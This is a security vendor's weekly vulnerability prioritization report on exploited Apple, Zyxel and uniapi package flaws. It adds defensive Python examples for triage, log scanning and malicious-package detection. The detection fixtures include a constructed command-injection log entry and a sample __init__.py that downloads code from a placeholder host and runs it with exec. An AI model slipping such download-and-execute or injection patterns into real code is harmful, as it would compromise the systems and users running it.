
Flashpoint Weekly Vulnerability Insights and Prioritization Report

Anticipate, contextualize, and prioritize vulnerabilities to effectively address threats to your organization.

February 5, 2025

The use of vulnerabilities as an initial access vector in threat actor campaigns is up by 180%, which makes it more imperative than ever to build an effective prioritization plan. In this ongoing series, we dive into the vulnerabilities Flashpoint has identified as high priority, explain why they should be a focus, and provide analysis to help organizations make faster prioritization decisions for more effective remediation.

With new vulnerability exploits and zero-days being discovered every day, having a proactive vulnerability management strategy is critical. By using this weekly report, security teams can adopt an intelligence-led approach for patch management—allowing organizations to implement timely remediation through comprehensive vulnerability intelligence.

Key Vulnerabilities:
Week of January 29, 2025

Foundational Prioritization

Of the vulnerabilities Flashpoint published this week, there are 172 that you can take immediate action on. Each of them has a solution available, has a public exploit, and is remotely exploitable. As such, these vulnerabilities are a great place to begin your prioritization efforts.

Image 1: Number of vulnerabilities published last week that have a publicly available exploit, are remotely exploitable and have a solution available. (Source: Flashpoint)

Diving Deeper – Urgent Vulnerabilities

Of the vulnerabilities Flashpoint published last week, three are highlighted in this week’s Vulnerability Insights and Prioritization Report because they all:

  • Are in widely used products and are potentially enterprise-affecting
  • Are exploited in the wild or have exploits available
  • Allow full system compromise
  • Can be exploited via the network alone or in combination with other vulnerabilities
  • Have a solution to take action on

In addition, all of these vulnerabilities are easily discoverable and therefore should be investigated and fixed immediately.
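The two cuts the report describes (the "foundational" filter and the five "urgent" criteria) are simple enough to encode as a triage function. The following is an added example, not Flashpoint's code or data: the records are constructed, the field names are assumptions, and the tiering only reproduces the criteria stated above.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class VulnRecord:
    """One vulnerability as a prioritization engine would see it (constructed schema)."""
    vuln_id: str
    title: str
    widely_used_product: bool      # in a widely used product, potentially enterprise-affecting
    exploited_in_wild: bool
    public_exploit: bool           # an exploit is publicly available
    full_compromise: bool          # consequence allows full system compromise
    remotely_exploitable: bool     # exploitable via the network alone
    exploitable_via_chain: bool    # network-reachable in combination with other vulnerabilities
    solution_available: bool       # a patch or vendor mitigation to act on
    cvss_v3: float


def is_foundational(r: VulnRecord) -> bool:
    """The report's first cut: has a solution, a public exploit exists, remotely exploitable."""
    return r.solution_available and r.public_exploit and r.remotely_exploitable


def is_urgent(r: VulnRecord) -> bool:
    """The five bullet criteria the report applies to its 'urgent' highlights."""
    return (r.widely_used_product
            and (r.exploited_in_wild or r.public_exploit)
            and r.full_compromise
            and (r.remotely_exploitable or r.exploitable_via_chain)
            and r.solution_available)


def tier(r: VulnRecord) -> int:
    """0 = urgent, 1 = foundational, 2 = everything else."""
    if is_urgent(r):
        return 0
    if is_foundational(r):
        return 1
    return 2


def foundational(records):
    return [r for r in records if is_foundational(r)]


def urgent(records):
    return [r for r in records if is_urgent(r)]


def prioritize(records):
    """Patch-queue ordering: tier first, then CVSS v3 descending (stable within ties)."""
    return sorted(records, key=lambda r: (tier(r), -r.cvss_v3))


# Constructed sample feed; IDs and products are placeholders, not real advisories.
SAMPLE = [
    VulnRecord("CVE-0000-0001", "ExampleOS remote command injection",
               True, True, True, True, True, True, True, 9.8),
    VulnRecord("CVE-0000-0002", "ExampleApp remote denial of service",
               True, False, True, False, True, False, True, 7.5),
    VulnRecord("CVE-0000-0003", "ExampleOS media parser use-after-free (local)",
               True, True, False, True, False, True, True, 7.8),
    VulnRecord("VULNDB-EXAMPLE-4", "ExampleLib deserialization RCE, no fix yet",
               True, False, True, True, True, True, False, 9.8),
]

if __name__ == "__main__":
    for r in prioritize(SAMPLE):
        print(tier(r), r.vuln_id, r.cvss_v3, r.title)
```

Note how the ordering differs from a pure CVSS sort: the unpatched 9.8 drops to the bottom because there is nothing to act on yet, while the local-only use-after-free rises because it is exploited in the wild and reachable as part of a chain.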

To address these vulnerabilities proactively and on an ongoing basis, organizations can leverage Flashpoint Vulnerability Intelligence. Flashpoint provides comprehensive coverage encompassing IT, OT, IoT, COTS, and open-source libraries and dependencies, cataloging over 100,000 vulnerabilities that are not included in the NVD or lack a CVE ID, which ensures thorough coverage beyond publicly available sources. Vulnerabilities not covered by the NVD do not yet have a CVE ID assigned and are noted with a VulnDB ID.

| CVE ID | Title | CVSS Scores (v2 / v3 / v4) | Exploit Status | Exploit Consequence | Ransomware Likelihood Score | Social Risk Score | Solution Availability |
|---|---|---|---|---|---|---|---|
| CVE-2025-24085 | Apple Multiple Products CoreMedia Unspecified Use-After-Free | 7.2 / 7.8 / 8.5 | Exploited in the wild | Local privilege escalation | Low | High | Yes |
| CVE-2024-40890 | Zyxel Multiple Products HTTP Unspecified Remote Command Execution | 10.0 / 9.8 / 9.3 | Exploited in the wild | Remote privilege escalation | High | Low | No official patch exists. Take action to mitigate risk. |
| CVE-2024-40891 | Zyxel Multiple Products Telnet Unspecified Remote Command Execution | 10.0 / 9.8 / 9.3 | Exploited in the wild | Remote command execution | Medium | Medium | No official patch exists. Take action to mitigate risk. |
| VulnDB ID: 389414 | uniapi Package for Python __init__.py Malicious Code Remote Code Execution | 10.0 / 9.8 / 9.3 | Exploited in the wild | Remote code execution | Medium | Pending | Yes |

Scores as of: February 5, 2025



NOTES: The severity score of a given vulnerability can change whenever new information becomes available. Flashpoint maintains its vulnerability database with the most recent and relevant information available. Log in to view more vulnerability metadata and the most up-to-date information.

CVSS scores: Our analysts calculate, and if needed adjust, NVD’s original CVSS scores when new information becomes available.

Social Risk Score: Flashpoint estimates how much attention a vulnerability receives on social media. Increased mentions and discussions elevate the Social Risk Score, indicating a higher likelihood of exploitation. The score considers factors like post volume and authors, and decreases as the vulnerability’s relevance diminishes.

Ransomware Likelihood: This score is a rating that estimates the similarity between a vulnerability and those known to be used in ransomware attacks. As we learn more information about a vulnerability (e.g. exploitation method, technology affected) and uncover additional vulnerabilities used in ransomware attacks, this rating can change.

Unfortunately, as of February 5, 2025, Zyxel has not released an official patch or firmware update to fully address these vulnerabilities. This means your devices are potentially at risk, and it’s crucial to take action to mitigate the risk. Here’s a breakdown of what you can do:

  • Restrict Access to the Device’s Web Interface:
    • Firewall Rules: Configure your router’s firewall to only allow connections to the Zyxel device’s web interface from trusted IP addresses. This limits the attack surface significantly.
    • Disable Remote Management: If you don’t use remote management features, disable them. This reduces the potential entry points for attackers.
  • Monitor Network Traffic:
    • Intrusion Detection/Prevention Systems (IDS/IPS): If you have an IDS/IPS in your network, configure it to monitor for suspicious HTTP POST requests targeting your Zyxel CPE devices.
    • Analyze Logs: Regularly check your device logs and network traffic for any unusual activity, especially HTTP POST requests with unexpected commands.
  • Stay Informed:
    • Zyxel Website: Keep a close eye on Zyxel’s official website and security advisories for any updates or patches related to CVE-2024-40890.
    • Security News: Follow security news and vulnerability databases to stay informed about the latest developments and potential workarounds.
  • Consider Alternative Solutions:
    • Device Replacement: If your device is end-of-life and Zyxel is not providing updates, consider replacing it with a more secure device.
  • Important Notes:
    • Authentication Required: This vulnerability requires an attacker to be authenticated on the device. Ensure you are using strong and unique passwords.
    • Active Exploitation: CVE-2024-40890 is being actively exploited in the wild, so it’s crucial to take the mitigation steps mentioned above as soon as possible.
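The "Monitor Network Traffic" steps above amount to two checks on management-plane requests: is the POST coming from a trusted source, and does its target carry characters that only make sense as shell syntax. The script below is an added example (not Zyxel's or Flashpoint's code) that runs both checks over constructed combined-format access log lines, as a reverse proxy or log collector in front of the CPE management interface might record them. The allowlist networks, the timestamps, the IPs (documentation ranges) and the `/cgi-bin/example-admin.cgi` path are all placeholders, not real Zyxel endpoints.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed access log lines (not captured traffic). The last line carries a URL-encoded
# semicolon in a parameter, the kind of "unexpected command" the report says to look for.
SAMPLE_LOG = """\
192.0.2.10 - - [29/Jan/2025:10:15:01 +0000] "POST /cgi-bin/example-admin.cgi HTTP/1.1" 200 512
203.0.113.7 - - [29/Jan/2025:10:16:44 +0000] "POST /cgi-bin/example-admin.cgi HTTP/1.1" 200 512
203.0.113.7 - - [29/Jan/2025:10:17:02 +0000] "GET /index.html HTTP/1.1" 200 1024
192.0.2.10 - - [29/Jan/2025:10:18:30 +0000] "POST /cgi-bin/example-admin.cgi?target=198.51.100.1%3Bls HTTP/1.1" 200 512
"""

# Management-plane allowlist (constructed): only these networks should ever POST to the device.
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24"), ipaddress.ip_network("10.0.0.0/8")]

# Combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Characters that separate or substitute shell commands. In a parameter of a management
# request they are a generic command-injection indicator worth a second look.
SHELL_META = re.compile(r"[;|&`]|\$\(")


def parse_line(line):
    """Return the named fields of one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_trusted(ip, nets=TRUSTED_NETS):
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in nets)


def flag_requests(log_text, nets=TRUSTED_NETS):
    """Return (ip, timestamp, target, reasons) for every POST that warrants review."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        reasons = []
        if not is_trusted(rec["ip"], nets):
            reasons.append("POST from outside the management allowlist")
        # Decode percent-encoding first so an encoded metacharacter is not missed.
        if SHELL_META.search(unquote(rec["target"])):
            reasons.append("shell metacharacters in request target")
        if reasons:
            findings.append((rec["ip"], rec["ts"], rec["target"], reasons))
    return findings


if __name__ == "__main__":
    for ip, ts, target, reasons in flag_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {target}: {'; '.join(reasons)}")
```

The allowlist check is the one that matters most while no patch exists: it turns the "Firewall Rules" step into something you can verify from logs after the fact. The metacharacter check is deliberately broad; treat it as a triage signal for the device's own logs, not as a signature for any particular exploit.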

Key Takeaway:

While waiting for an official patch, the best course of action is to implement the mitigation strategies above to minimize the risk of exploitation. Remember that the ultimate solution is always to install the official patch from the vendor as soon as it becomes available.

Flashpoint Ignite lays all of these components out. Below is an example of what the vulnerability record for the Apple Multiple Products CoreMedia vulnerability looks like.

[Image: Flashpoint Ignite vulnerability record for the Apple Multiple Products CoreMedia vulnerability]

This record provides additional metadata like affected product versions, MITRE ATT&CK mapping, analyst notes, solution description, classifications, vulnerability timeline and exposure metrics, exploit references and more.

Analyst Comments on the Notable Vulnerabilities

Below, Flashpoint analysts describe the three vulnerabilities highlighted above as vulnerabilities that should be of focus for remediation if your organization is exposed.

CVE-2025-24085

The first is a critical zero-day vulnerability in Apple’s Core Media that allowed attackers to control devices via a use-after-free error. Exploited in iOS versions before 17.2, it was addressed by Apple in the latest iOS and macOS updates:

CVE-2025-24085 is a zero-day vulnerability found in Apple’s Core Media component that could allow attackers to take control of vulnerable devices. Multiple Apple products contain an unspecified use-after-free error in the CoreMedia component triggered when certain input is not properly validated. This may allow a local attacker to de-reference already freed memory and execute arbitrary code with elevated privileges. This use-after-free vulnerability is being actively exploited in iOS versions before 17.2. As of January 27, it was reported as being exploited in the wild. Apple has addressed this issue by improving memory management in the latest iOS and macOS updates.

CVE-2024-40890 and CVE-2024-40891

The second is a pair of command injection vulnerabilities (CVE-2024-40890, CVE-2024-40891) in two different components of Zyxel CPE devices that allow attackers to execute commands. The vulnerabilities were reported as exploited in the wild as of January 28:

CVE-2024-40890 and CVE-2024-40891 are both command injection vulnerabilities affecting Zyxel CPE Series devices. These flaws allow attackers to execute arbitrary commands on vulnerable devices, potentially leading to complete system compromise, data exfiltration, or network infiltration. These vulnerabilities exist because the Zyxel devices fail to properly sanitize user inputs, allowing attackers to inject malicious commands that the device’s operating system will execute. As of January 28, they were reported as being exploited in the wild.

uniapi package for Python

The third, a Flashpoint-exclusive vulnerability, is a malicious uniapi Python package (version 1.0.7) that allowed remote code execution and system information disclosure:

The uniapi package for Python was reported to contain malicious code in “__init__.py” that allows a remote attacker to execute arbitrary code and disclose system information. The malicious code downloads and executes Python code that sends system information to the attacker’s server; because the attacker controls that server, changes to the downloaded code could allow the execution of arbitrary code. Version 1.0.6 and prior are not affected by this issue. If a user has installed the trojaned distribution of version 1.0.7, their system is potentially compromised. The only way to ensure that it is completely safe is to reinstall the operating system and all applications.
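Two defensive checks follow from this description: whether the affected version is present in an environment, and whether a package's `__init__.py` does the download-and-execute pattern described above at import time. The script below is an added example, not Flashpoint's tooling: the advisory record is transcribed from this report (only 1.0.7 is matched, since the report says nothing about later releases), and the `pip freeze` output and both `__init__.py` sources are constructed.

```python
import ast
import re

# Advisory transcribed from this report: uniapi 1.0.7 shipped a trojaned __init__.py;
# 1.0.6 and earlier are not affected. Only 1.0.7 is matched here (assumption).
ADVISORIES = {"uniapi": {(1, 0, 7)}}


def parse_version(v):
    """Loose numeric version tuple; avoids depending on the `packaging` library."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def affected_packages(freeze_text):
    """Return (name, version) pairs from `pip freeze` output that match an advisory."""
    hits = []
    for line in freeze_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "==" not in line:
            continue
        name, version = line.split("==", 1)
        name, version = name.strip().lower(), version.strip()
        if parse_version(version) in ADVISORIES.get(name, set()):
            hits.append((name, version))
    return hits


# Call names that fetch remote content, and names that turn data into running code.
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post"}
EXEC_CALLS = {"exec", "eval"}


def _call_name(node):
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return ""


def suspicious_init(source):
    """Static heuristic over the module body only (code that runs on import): report whether
    it both fetches over the network and passes data to exec/eval. Function and class bodies
    are skipped because they do not execute at import time."""
    tree = ast.parse(source)
    names = set()
    for stmt in tree.body:
        if isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef)):
            continue
        names |= {_call_name(n) for n in ast.walk(stmt) if isinstance(n, ast.Call)}
    reasons = []
    if names & NETWORK_CALLS:
        reasons.append("network fetch at import time")
    if names & EXEC_CALLS:
        reasons.append("dynamic code execution (exec/eval) at import time")
    return reasons


# Constructed inputs; the "suspicious" source only mirrors the pattern the report describes.
FREEZE_OUTPUT = """\
requests==2.32.3
uniapi==1.0.7
numpy==1.26.4
"""

BENIGN_INIT = '''
from .client import Client
__version__ = "1.0.6"

def fetch(url):
    from urllib.request import urlopen
    return urlopen(url).read()
'''

SUSPICIOUS_INIT = '''
from urllib.request import urlopen
__version__ = "1.0.7"
_stage2 = urlopen("https://example.invalid/stage2.py").read()  # constructed URL
exec(_stage2)
'''

if __name__ == "__main__":
    print("affected:", affected_packages(FREEZE_OUTPUT))
    print("benign:", suspicious_init(BENIGN_INIT))
    print("suspicious:", suspicious_init(SUSPICIOUS_INIT))
```

The version check is what you run across every environment first; the AST heuristic is for the case the report's last sentence is about, deciding whether a host that had the package installed actually executed anything on import. A hit on both reasons is the signal; a hit on only one (many legitimate packages fetch data, and some use `eval` on their own constants) is not.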

Previously Highlighted Vulnerabilities

| CVE/VulnDB ID | Name/Title | Flashpoint Published Date |
|---|---|---|
| CVE-2025-21218 | Microsoft Windows Kerberos Unspecified Application Handling Resource Consumption Remote DoS | Week of January 15, 2025 |
| CVE-2024-57811 | Eaton XC-303 Hardcoded Credentials | Week of January 15, 2025 |
| CVE-2024-55591 | Fortinet FortiOS (FortiGate) / FortiProxy Node.js WebSocket Module Improper Authentication Remote Authentication Bypass | Week of January 15, 2025 |
| CVE-2025-23006 | SonicWall SMA1000 Unspecified Insecure Deserialization | Week of January 22, 2025 |
| CVE-2025-20156 | Cisco Meeting Management (CMM) Unspecified REST API Endpoint Improper Authorization API Request Handling | Week of January 22, 2025 |
| CVE-2024-50664 | GPAC isomedia/sample_descs.c gf_isom_new_mpha_description() Function MPEGH Audio Configuration Handling Heap Buffer Overflow | Week of January 22, 2025 |

Transform Vulnerability Management with Flashpoint

Subscribe to our newsletter, which features Flashpoint’s leading data and intelligence, and request a demo today to see how Flashpoint can transform your vulnerability management and exposure identification program.
